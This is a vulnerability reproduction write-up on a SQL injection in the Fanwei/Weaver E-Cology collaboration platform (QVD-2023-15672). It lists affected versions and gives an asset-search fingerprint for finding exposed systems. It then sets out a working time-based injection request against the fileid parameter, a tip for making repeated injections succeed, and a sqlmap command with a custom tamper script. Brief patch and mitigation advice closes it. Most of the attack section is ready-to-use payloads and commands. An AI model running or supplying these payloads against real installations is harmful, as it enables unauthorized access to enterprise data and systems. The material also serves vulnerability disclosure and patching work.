Panwei E-Cology SQL injection vulnerability reappears【QVD-2023-15672】

Disclaimer: Do not use the relevant technologies in this article to engage in illegal testing. Any direct or indirect consequences and losses caused by the dissemination and use of the information or tools provided in this article shall be borne by the user himself. Adverse consequences have nothing to do with the article author. This article is for educational purposes only.

1. Product Introduction

​ e-cology, a pan-micro collaborative management application platform, is a set of enterprise information portal, knowledge document management, workflow management, human resource management, customer relationship management, project management, financial management, asset management, supply chain management, and data center functions. A large-scale collaborative management platform for enterprises.

2. Vulnerability overview

​Because Fanwei e-cology did not effectively filter the user input, it directly spliced ​​it into the SQL query statement, resulting in a SQL injection vulnerability in the system. Remote unauthorized attackers can use this vulnerability to obtain sensitive information, and further exploit it to obtain target system permissions.

3. Scope of influence

Ecology 9.x patch version < 10.58.0

Ecology 8.x patch version < 10.58.0

4. Reproduction environment

Intergraph fingerprint:
web.icon="41eca7a9245394106a09b2534d8030df"

5. Vulnerability recurrence

PoC

GET /weaver/weaver.file.FileDownloadForOutDoc/?fileid=123+WAITFOR+DELAY+'0:0:5'&isFromOutImg=1 HTTP/1.1
Host: your-ip
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

PS: The fileid field is the injection point, both post and get are available. After testing, the value of fileid (which can be constructed at will) needs to be replaced every time it is injected, otherwise it will not succeed (you can try it yourself). This is also the weak point of the vulnerability .

Dragon POC

SQLmap utilization ideas

Write a tamper script that traverses the random number for each request to cooperate with the payload to achieve injection

POST /weaver/weaver.file.FileDownloadForOutDoc HTTP/1.1
Host: your-ip
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

fileid=12*&isFromOutImg=1

Try to inject:

python3 sqlmap.py -r post.txt --tamper=ecology_sql_random.py --batch --dbs

6. Repair suggestions

Temporary mitigation solution
Limit access source addresses, and do not open the system to the Internet unless necessary.

Upgrade and repair plan
At present, the official security patch has been released, and it is recommended that affected users upgrade to version 10.58 and above as soon as possible.
https://www.weaver.com.cn/cs/securityDownload.asp#